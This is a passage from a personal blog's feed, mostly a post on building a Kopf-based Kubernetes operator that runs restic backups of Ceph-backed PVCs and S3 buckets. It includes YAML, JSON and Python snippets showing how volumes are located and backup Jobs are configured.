<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-audiobookshelf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">abs-data-volume</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span></code></pre></div><p>The only configuration needed is the name of the backup bucket and a list of the S3
buckets and PVCs to be backed up.</p>
<p>In this case, my Audiobookshelf deployment only has a single PVC:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">abs-data-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">100Gi</span>
</span></span></code></pre></div><p>The operator will figure out where that volume is currently mounted and launch
a backup Job on that host.</p>
<p>And that&rsquo;s it! The backups are finally working, and by now several weeks&rsquo;
worth of backups have been successful. It was a pretty long detour, but I did have
at least some fun writing a small-ish project that I&rsquo;m actually using.</p>
<p>The next installment of this series will come pretty soon, because I&rsquo;m already
done migrating my Drone CI instance on Nomad to a Woodpecker CI instance
on k8s. The only thing left to do is to write the blog post.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part III: Running Backups</title>
      <link>https://blog.mei-home.net/posts/backup-operator-3-running-backups/</link>
      <pubDate>Fri, 10 Jan 2025 22:10:52 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-3-running-backups/</guid>
      <description>Implementing the actual backups</description>
      <content:encoded><![CDATA[<p>In the last couple of months, I&rsquo;ve been working on a k8s operator for running
backups of persistent volumes and S3 buckets in my cluster.
Previous installments of the series can be found <a href="https://blog.mei-home.net/tags/hlbo/">here</a>.</p>
<p>And now, I&rsquo;m finally done with it, and over the weekend, I ran the first
successful backups. Time to describe what I&rsquo;ve implemented, why and how.</p>
<h2 id="recap">Recap</h2>
<p>Let&rsquo;s start with a recap. For a more detailed description of the problem,
have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">this post in my k8s migration series</a>.</p>
<p>In short, my previous backup implementation on my Nomad cluster runs a container
on each host in the cluster. This container then checks which jobs run on the
host and backs up the volumes noted in the config file for each of those jobs.
This approach would not work on Kubernetes, because k8s does not provide an API
similar to Nomad&rsquo;s <a href="https://developer.hashicorp.com/nomad/docs/schedulers#system-batch">Sysbatch jobs</a>.
Those types of jobs launch a given container on every host in the cluster, with
a run-to-completion setup.
Kubernetes, on the other hand, only knows Jobs, which cannot be run on every host
simultaneously, and DaemonSets, which don&rsquo;t have run-to-completion semantics.</p>
<p>There would have, of course, been the easy way out: Using an existing solution.
But where&rsquo;s the fun in that?</p>
<p>So I decided to take this chance to learn the Kubernetes API a bit better,
and write my own operator. Because I&rsquo;m relatively familiar with Python,
I decided to use the <a href="https://github.com/nolar/kopf">Kopf</a> framework.</p>
<p>The end goal was to have a per-app configuration in the form of a custom resource
definition which tells the operator which volumes and buckets need to be backed
up. Here is an example I used for my tests:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-service-backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">runNow</span>: <span style="color:#e6db74">&#34;12&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;backup-operator-testing&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mysql-pv-claim</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-pv-claim</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">service-backup-test</span>
</span></span></code></pre></div><p>This object instructs my operator to back up the MySQL and WordPress volumes
of a WordPress deployment I launched just for testing purposes. It also contains
an S3 bucket that&rsquo;s not used by the deployment and just exists to test that part
of the operator.</p>
<h2 id="high-level-overview">High level overview</h2>
<p>Alright, let&rsquo;s assume that we&rsquo;ve got the above example HomelabServiceBackup (HLSB).
What do I want to happen when a backup is triggered?</p>
<p>On the most basic level, I want two things to happen:</p>
<ol>
<li>The two <code>pvc</code> type entries in the <code>spec.backups</code> list are run through restic
to back them up. This means the backup needs access to those volumes.</li>
<li>The <code>s3</code> type bucket is downloaded to a temporary location, and then restic
is run on that temporary location to make an incremental backup of the bucket.</li>
</ol>
<p><strong>BAD THINGS.</strong> This paragraph is the &ldquo;Do as I say, not as I do&rdquo; part of this
post. First of all, running backups on live data is generally a bad idea. You
might end up with inconsistent state in your backup.
Second, there are perfectly good block-level backup capabilities right in Ceph.
With consistency guarantees. But I don&rsquo;t like those. They basically require a
second Ceph cluster as a backup target.
<strong>To reiterate:</strong> What I&rsquo;m doing here is bad. And I know that what I&rsquo;m doing
here is bad. It&rsquo;s working for me, but I&rsquo;m really not advising you to do the same
thing. That&rsquo;s the main reason I will likely never publish the operator I wrote -
I just don&rsquo;t think it&rsquo;s a good idea.</p>
<p>With that out of the way, which steps need to be completed?</p>
<ol>
<li>Determine where each of the <code>pvc</code> type volumes is mounted</li>
<li>Split the volumes into groups by the host they&rsquo;re currently mounted on</li>
<li>For each of those groups:
<ul>
<li>Create a ConfigMap with the configuration for that particular group</li>
<li>Create a Job for each group and launch them, in sequence</li>
</ul>
</li>
<li>Determine whether all jobs were successful and update the HLSB object in the
k8s cluster</li>
</ol>
<p>The HLSB object has a <code>status.state</code> property, which can be one of:</p>
<ul>
<li><code>Running</code></li>
<li><code>Success</code></li>
<li><code>Failed</code></li>
</ul>
<p>These are then later used by a Grafana panel using Prometheus data from
kube-state-metrics to show whether all of the backups were successful.</p>
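<p>To give a rough idea of where that state comes from, here&rsquo;s a minimal sketch of
a Kopf handler setting it. The handler, the CRD plural and the <code>run_backup_jobs</code>
helper are made up for illustration (and the intermediate <code>Running</code> state is
omitted); only the state values themselves match my CRD.</p>
<pre tabindex="0"><code>import kopf

async def run_backup_jobs(spec):
    # placeholder for the actual backup logic described in this post
    return True

@kopf.on.create(&#34;mei-home.net&#34;, &#34;v1alpha1&#34;, &#34;homelabservicebackups&#34;)
async def backup(spec, patch, **kwargs):
    ok = await run_backup_jobs(spec)
    # Kopf applies this patch to the HLSB object once the handler returns
    patch[&#34;status&#34;] = {&#34;state&#34;: &#34;Success&#34; if ok else &#34;Failed&#34;}
</code></pre>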
<p>Now let&rsquo;s have a closer look at the above steps.</p>
<h2 id="implementation-details">Implementation details</h2>
<h3 id="finding-volumes-and-hosts">Finding volumes and hosts</h3>
<p>Let&rsquo;s look at the backup list from the example HLSB above again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mysql-pv-claim</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-pv-claim</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span></code></pre></div><p>I&rsquo;m ignoring the <code>s3</code> type entry here, because quite frankly, it&rsquo;s not that
interesting.</p>
<p>For the <code>pvc</code> type entries, the very first step is to determine on which host
they&rsquo;re currently mounted. Because the PVCs might be RWO, we cannot just mount
them into the backup Pod while the apps using them are still running. Instead,
I use a <a href="https://kubernetes.io/docs/concepts/storage/volumes/#hostpath">hostPath</a>
volume to mount the directory where the Ceph CSI provider mounts the volume
into the backup container.</p>
<p>For that to work, I need to know on which host the volume is actually mounted.
And for apps with multiple Pods and associated volumes, that may be multiple
hosts. Which presents yet another challenge: Restic, when backing up to a
repository, locks that repository, so there can only ever be a single writer.
My backup buckets are separated by app, so even if an app has multiple volumes
defined, like the example above, I can only ever run one backup Job at a time for it.
If multiple volumes happen to be mounted on a single host, that&rsquo;s not a problem.
The backup Job for that host can back up all of them. But if they happen to be mounted
on separate hosts, there need to be multiple Jobs, running one after the other.</p>
<p>So how to get the volumes? With the Kubernetes API. As input for our journey,
we&rsquo;ve got the PVC defined, with its name and namespace, in the list of things
to back up.</p>
<p>So the first action is to fetch the PVC via the Kubernetes API. Because I&rsquo;m
writing async code in Kopf, I&rsquo;m using <a href="https://github.com/tomplus/kubernetes_asyncio">kubernetes_asyncio</a>
instead of the official Kubernetes Python lib.</p>
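<p>Fetching the claim is a single API call. Here&rsquo;s a minimal sketch with
kubernetes_asyncio; the function and the way the client gets configured are
illustrative, not the operator&rsquo;s literal code:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client, config

async def fetch_pvc(name, namespace):
    # in-cluster credentials; outside the cluster, await config.load_kube_config()
    config.load_incluster_config()
    async with client.ApiClient() as api:
        core_v1 = client.CoreV1Api(api)
        return await core_v1.read_namespaced_persistent_volume_claim(name, namespace)
</code></pre>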
<p>Here&rsquo;s what the PVC looks like, with the <code>wp-pv-claim</code> from the example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;PersistentVolumeClaim&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;app&#34;</span>: <span style="color:#e6db74">&#34;wordpress&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;app.kubernetes.io/managed-by&#34;</span>: <span style="color:#e6db74">&#34;Helm&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;testing&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;wp-pv-claim&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;testing&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;resources&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;requests&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;storageClassName&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeMode&#34;</span>: <span style="color:#e6db74">&#34;Filesystem&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeName&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;capacity&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;phase&#34;</span>: <span style="color:#e6db74">&#34;Bound&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I removed a couple of pieces which aren&rsquo;t that interesting. With this info in
hand, we can go to the next step, fetching the PersistentVolume backing this
claim. This can also be done pretty easily with the <code>read_persistent_volume</code>
API, which only needs a name as input, because PersistentVolumes are cluster
level resources. The name of the volume backing the claim can be taken from
the <code>spec.volumeName</code> property.</p>
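<p>In code, that&rsquo;s again just one call. A small sketch, assuming the CoreV1Api
client and the PVC from the previous step are already at hand:</p>
<pre tabindex="0"><code>async def fetch_backing_pv(core_v1, pvc):
    # PersistentVolumes are cluster-scoped, so only the name is needed
    return await core_v1.read_persistent_volume(pvc.spec.volume_name)
</code></pre>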
<p>The result for the above PVC would look like this, again with unimportant bits
removed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;PersistentVolume&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;capacity&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;csi&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;controllerExpandSecretRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;rook-csi-rbd-provisioner&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;driver&#34;</span>: <span style="color:#e6db74">&#34;rook-ceph.rbd.csi.ceph.com&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;fsType&#34;</span>: <span style="color:#e6db74">&#34;ext4&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;nodeStageSecretRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;rook-csi-rbd-node&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;volumeAttributes&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;clusterID&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;imageFeatures&#34;</span>: <span style="color:#e6db74">&#34;layering,exclusive-lock,object-map,fast-diff&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;imageName&#34;</span>: <span style="color:#e6db74">&#34;csi-vol-3361c6d5-4269-4ab2-bc14-771420b768a7&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;journalPool&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;pool&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;volumeHandle&#34;</span>: <span style="color:#e6db74">&#34;0001-000c-rook-cluster-0000000000000003-3361c6d5-4269-4ab2-bc14-771420b768a7&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;persistentVolumeReclaimPolicy&#34;</span>: <span style="color:#e6db74">&#34;Retain&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;storageClassName&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeMode&#34;</span>: <span style="color:#e6db74">&#34;Filesystem&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;phase&#34;</span>: <span style="color:#e6db74">&#34;Bound&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>One potentially useful side-note: The <code>spec.csi.volumeAttributes.imageName</code>
property is the name of the backing RBD volume in Ceph.</p>
<p>The third thing we need is the <a href="https://kubernetes.io/docs/reference/kubernetes-api/config-and-storage-resources/volume-attachment-v1/">VolumeAttachment</a>
for the PersistentVolume, which tells us where it is currently mounted.
Sadly, there is no API to look up the attachment for a given
PersistentVolume (or multiple attachments of the same volume, if it is RWX).
So instead, I&rsquo;m fetching all of the attachments with the <code>list_volume_attachments</code>
API. This one, again, is not namespaced.
Here is the current attachment for the above PersistentVolume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;storage.k8s.io/v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;VolumeAttachment&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;creationTimestamp&#34;</span>: <span style="color:#e6db74">&#34;2024-12-29T10:44:46Z&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;csi-8aee698fd97659b400535fa69969815fad87d2b761d69625d04afc95d53bf252&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;resourceVersion&#34;</span>: <span style="color:#e6db74">&#34;152545692&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;uid&#34;</span>: <span style="color:#e6db74">&#34;6cbe234b-e2c7-4596-a4b6-03d66eb45f5f&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;attacher&#34;</span>: <span style="color:#e6db74">&#34;rook-ceph.rbd.csi.ceph.com&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;nodeName&#34;</span>: <span style="color:#e6db74">&#34;sehith&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;source&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;persistentVolumeName&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;attached&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The <code>spec.nodeName</code> provides us with what we need: The name of the host where
the volume is currently mounted.</p>
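<p>Filtering the attachment list down to our volume then looks roughly like this;
the helper is illustrative, and an RWX volume could of course yield more than one
node:</p>
<pre tabindex="0"><code>from kubernetes_asyncio import client

async def find_attachment_nodes(api, pv_name):
    storage_v1 = client.StorageV1Api(api)
    attachments = await storage_v1.list_volume_attachment()
    # keep the nodes of all attachments pointing at our PersistentVolume
    return [
        att.spec.node_name
        for att in attachments.items
        if att.spec.source.persistent_volume_name == pv_name
    ]
</code></pre>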
<p>Next, how to figure out which <code>hostPath</code> to use to mount that volume into the
backup container? That&rsquo;s done with this small Python function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_ceph_csi_host_path</span>(pv):
</span></span><span style="display:flex;"><span>    volume_handle <span style="color:#f92672">=</span> pv<span style="color:#f92672">.</span>spec<span style="color:#f92672">.</span>csi<span style="color:#f92672">.</span>volume_handle
</span></span><span style="display:flex;"><span>    driver <span style="color:#f92672">=</span> pv<span style="color:#f92672">.</span>spec<span style="color:#f92672">.</span>csi<span style="color:#f92672">.</span>driver
</span></span><span style="display:flex;"><span>    vol_id_digest <span style="color:#f92672">=</span> sha256(bytes(volume_handle, <span style="color:#e6db74">&#39;utf-8&#39;</span>))<span style="color:#f92672">.</span>hexdigest()
</span></span><span style="display:flex;"><span>    p <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span><span style="color:#f92672">.</span>join([
</span></span><span style="display:flex;"><span>        CSI_MOUNT_PREFIX,
</span></span><span style="display:flex;"><span>        driver,
</span></span><span style="display:flex;"><span>        vol_id_digest,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;globalmount&#34;</span>,
</span></span><span style="display:flex;"><span>        volume_handle
</span></span><span style="display:flex;"><span>    ])
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> p
</span></span></code></pre></div><p>It takes the PersistentVolume as input; <code>CSI_MOUNT_PREFIX</code> is the constant
<code>/var/lib/kubelet/plugins/kubernetes.io/csi</code>. In addition, there is a SHA-256 hash of
the <code>spec.csi.volume_handle</code> in the path. The full mount path looks like this:</p>
<pre tabindex="0"><code>/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/fb3f47df032796f8ee3f021a858f09772c60bf6b30a75288a4887852a59b071f/globalmount/0001-000c-rook-cluster-0000000000000003-3361c6d5-4269-4ab2-bc14-771420b768a7
</code></pre><p>And yes, for some reason the path contains the volume&rsquo;s <code>volume_handle</code> once in
plain form, and once in hashed form. I have no idea what the reason behind that is.
Plus, it&rsquo;s worth noting that this is specific to the Ceph CSI driver. The
paths for other drivers would look different.</p>
<h3 id="creating-the-configuration-file">Creating the configuration file</h3>
<p>Because we&rsquo;ve only got two volumes in our example HLSB, let&rsquo;s assume that both
of them are mounted on the same host. So this particular backup would only need
to run a single Job. That Job needs to be told what it&rsquo;s supposed to back up,
which I&rsquo;m doing by creating a fresh ConfigMap for the job. An example for the
two volumes in our example HLSB would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hlsb-conf.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    retention:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      daily: 7
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      monthly: 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      weekly: 6
